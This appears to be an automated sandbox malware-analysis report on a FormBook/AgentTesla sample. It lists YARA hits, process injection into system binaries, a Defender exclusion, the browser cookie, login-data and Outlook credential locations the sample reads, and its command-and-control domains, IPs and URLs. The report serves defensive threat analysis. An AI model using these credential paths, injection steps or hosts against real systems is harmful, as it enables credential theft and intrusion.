                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		612
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571280 Sample: MN1qo2qaJmEvXDP.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 57 www.lingdianyun29.xyz 2->57 59 www.6822662.xyz 2->59 61 13 other IPs or domains 2->61 73 Suricata IDS alerts for network traffic 2->73 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 Multi AV Scanner detection for submitted file 2->77 81 6 other signatures 2->81 10 MN1qo2qaJmEvXDP.exe 6 2->10         started        14 rlJvZXSinaRi.exe 4 2->14         started        signatures3 79 Performs DNS queries to domains with low reputation 59->79 process4 file5 51 C:\Users\user\AppData\...\rlJvZXSinaRi.exe, PE32 10->51 dropped 53 C:\Users\...\rlJvZXSinaRi.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp1B5C.tmp, XML 10->55 dropped 91 Uses schtasks.exe or at.exe to add and modify task schedules 10->91 93 Writes to foreign memory regions 10->93 95 Allocates memory in foreign processes 10->95 97 Adds a directory exclusion to Windows Defender 10->97 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        27 2 other processes 10->27 99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 103 Injects a PE file into a foreign processes 14->103 23 schtasks.exe 1 14->23         started        25 RegSvcs.exe 14->25         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 16->69 29 aDvThgRLSEMTIq.exe 16->29 injected 71 Loading BitLocker PowerShell Module 19->71 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 27->40         started        process9 signatures10 105 Found direct / indirect Syscall (likely to bypass EDR) 29->105 42 systray.exe 13 29->42         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 42->83 85 Tries to harvest and steal browser information (history, passwords, etc) 42->85 87 Modifies the context of a thread in another process (thread injection) 42->87 89 3 other signatures 42->89 45 aDvThgRLSEMTIq.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 63 hayaniya.org 192.185.147.100, 49738, 49739, 49740 OIS1US United States 45->63 65 www.learnnow.info 199.192.23.123, 49764, 49765, 49766 NAMECHEAP-NETUS United States 45->65 67 8 other IPs or domains 45->67 107 Found direct / indirect Syscall (likely to bypass EDR) 45->107 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MN1qo2qaJmEvXDP.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                MN1qo2qaJmEvXDP.exe47%VirustotalBrowse
                MN1qo2qaJmEvXDP.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.6822662.xyz/gaoqiaoshengzi/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/727a57698696.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/366b199632.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/547f57698876.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/caimeixunguoz/0%Avira URL Cloudsafe
                http://www.6822662.xyz/shuiyechaoyang/0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/9/0%Avira URL Cloudsafe
                https://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY0%Avira URL Cloudsafe
                http://www.6822662.xyz/0%Avira URL Cloudsafe
                http://www.6822662.xyz/xiaotianyou/0%Avira URL Cloudsafe
                http://www.6822662.xyz/mingrihuaqiluo/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/7283870.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/kuisi/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/5680960.jpg0%Avira URL Cloudsafe
                http://www.zrinorem-srumimit.sbs/xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM=0%Avira URL Cloudsafe
                https://0dyos.com0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/8363280.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/149c599845.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/1/0%Avira URL Cloudsafe
                http://www.hayaniya.org/yf1h/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/524e57698899.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/macangyou/0%Avira URL Cloudsafe
                http://www.6822662.xyz/changzezi/0%Avira URL Cloudsafe
                http://www.lingdianyun29.xyz/404o/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/1890970.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/31b57699392.html0%Avira URL Cloudsafe
                http://www.nieuws-july202488.sbs/30le/0%Avira URL Cloudsafe
                http://www.6822662.xyz/baishimolinair/0%Avira URL Cloudsafe
                http://www.6822662.xyz/yasendi/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/8182900.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/343e599651.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/xiqijiexika/0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/2/0%Avira URL Cloudsafe
                http://www.nieuws-july202488.sbs/30le/?Ebfx6=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERU+xtauim+BahOPB0GJcVol5yfYldYk=&Njld=LDTtwxbX2vi0G0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/898f57698525.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/072d399924.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/233e199765.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/zuozuomumingxib/0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/7/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/2328450.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/fengxiangnaiya/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/239f57699184.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/tianshimeng/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/484e57698939.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/1214150.jpg0%Avira URL Cloudsafe
                http://www.hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G0%Avira URL Cloudsafe
                http://www.6822662.xyz/xidaoailiw/0%Avira URL Cloudsafe
                http://www.6822662.xyz/daqiaoweijiu/0%Avira URL Cloudsafe
                http://www.learnnow.info0%Avira URL Cloudsafe
                http://www.6822662.xyz/aiyinmaliya/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/8825750.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/taonaimuxiangnai/0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/10/0%Avira URL Cloudsafe
                http://www.6822662.xyz/tianhaiyi/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/188b57699235.html0%Avira URL Cloudsafe
                http://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8=0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/077b57699346.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/zuozuomumingxi/0%Avira URL Cloudsafe
                http://www.6822662.xyz/diya/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/273e57699150.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/7283490.jpg0%Avira URL Cloudsafe
                http://www.lingdianyun29.xyz/404o/?Njld=LDTtwxbX2vi0G&Ebfx6=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsICWCsVDGGe9oFVLx/4b7CRN5YGXwG8=0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/831c57698592.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/8/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/5809920.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/598f57698825.html0%Avira URL Cloudsafe
                http://www.losmason.shop/s15n/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/4265400.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/2195710.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/303150.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/lingcunailid/0%Avira URL Cloudsafe
                http://www.6822662.xyz/sitemap.xml0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/5433670.jpg0%Avira URL Cloudsafe
                http://hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/324c57699099.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/5/0%Avira URL Cloudsafe
                http://www.learnnow.info/d5up/?Ebfx6=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGpFc29QbO/AvwrqpPk1c7Mdu4vpn2Z4=&Njld=LDTtwxbX2vi0G0%Avira URL Cloudsafe
                http://www.6822662.xyz/kuisia/0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/489a199509.html0%Avira URL Cloudsafe
                http://www.learnnow.info/d5up/0%Avira URL Cloudsafe
                http://www.zrinorem-srumimit.sbs/xyvr/0%Avira URL Cloudsafe
                http://www.6822662.xyz/dnjw/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/7650520.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/738e57698685.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/dnjw/?Ebfx6=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfBLCVUFvihPDLt9byicPXxQNcd7bh2g=&Njld=LDTtwxbX2vi0G0%Avira URL Cloudsafe
                http://www.6822662.xyz/jiuzhonghuannai/6/0%Avira URL Cloudsafe
                http://www.6822662.xyz/uploads/images/3560300.jpg0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/508a57698915.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/Dating/521f499474.html0%Avira URL Cloudsafe
                http://www.6822662.xyz/chaomeihuixiang/0%Avira URL Cloudsafe
                http://www.6822662.xyz/yuantianmeiyingh/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                nieuws-july202488.sbs
                		162.0.215.33
                		truetrue
                  		unknown
                  www.carpentry.club
                  		52.60.87.163
                  		truetrue
                    		unknown
                    hayaniya.org
                    		192.185.147.100
                    		truetrue
                      		unknown
                      holytur.net
                      		185.106.208.3
                      		truefalse
                        		unknown
                        www.losmason.shop
                        		104.18.73.116
                        		truetrue
                          		unknown
                          www.lingdianyun29.xyz
                          		121.43.155.35
                          		truetrue
                            		unknown
                            www.zrinorem-srumimit.sbs
                            		104.21.38.113
                            		truetrue
                              		unknown
                              www.6822662.xyz
                              		103.249.106.91
                              		truetrue
                                		unknown
                                www.learnnow.info
                                		199.192.23.123
                                		truetrue
                                  		unknown
                                  www.lovel.shop
                                  		13.248.169.48
                                  		truetrue
                                    		unknown
                                    duskgazes.work
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      www.nieuws-july202488.sbs
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.duskgazes.work
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.holytur.net
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.hayaniya.org
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.zrinorem-srumimit.sbs/xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hayaniya.org/yf1h/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.lingdianyun29.xyz/404o/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nieuws-july202488.sbs/30le/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nieuws-july202488.sbs/30le/?Ebfx6=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERU+xtauim+BahOPB0GJcVol5yfYldYk=&Njld=LDTtwxbX2vi0Gtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0Gtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.lingdianyun29.xyz/404o/?Njld=LDTtwxbX2vi0G&Ebfx6=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsICWCsVDGGe9oFVLx/4b7CRN5YGXwG8=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.losmason.shop/s15n/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.learnnow.info/d5up/?Ebfx6=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGpFc29QbO/AvwrqpPk1c7Mdu4vpn2Z4=&Njld=LDTtwxbX2vi0Gtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.zrinorem-srumimit.sbs/xyvr/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.learnnow.info/d5up/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.6822662.xyz/dnjw/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.6822662.xyz/dnjw/?Ebfx6=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfBLCVUFvihPDLt9byicPXxQNcd7bh2g=&Njld=LDTtwxbX2vi0Gtrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.6822662.xyz/Dating/727a57698696.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPYsystray.exe, 00000013.00000002.4782860137.00000000057D8000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.00000000030A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/chrome_newtabsystray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.6822662.xyz/gaoqiaoshengzi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.6822662.xyz/Dating/366b199632.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.6822662.xyz/caimeixunguoz/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/ac/?q=systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.6822662.xyz/xiaotianyou/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/jiuzhonghuannai/9/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/Dating/547f57698876.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/shuiyechaoyang/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/kuisi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/uploads/images/7283870.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/mingrihuaqiluo/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/uploads/images/5680960.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://0dyos.comaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003A14000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/uploads/images/8363280.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
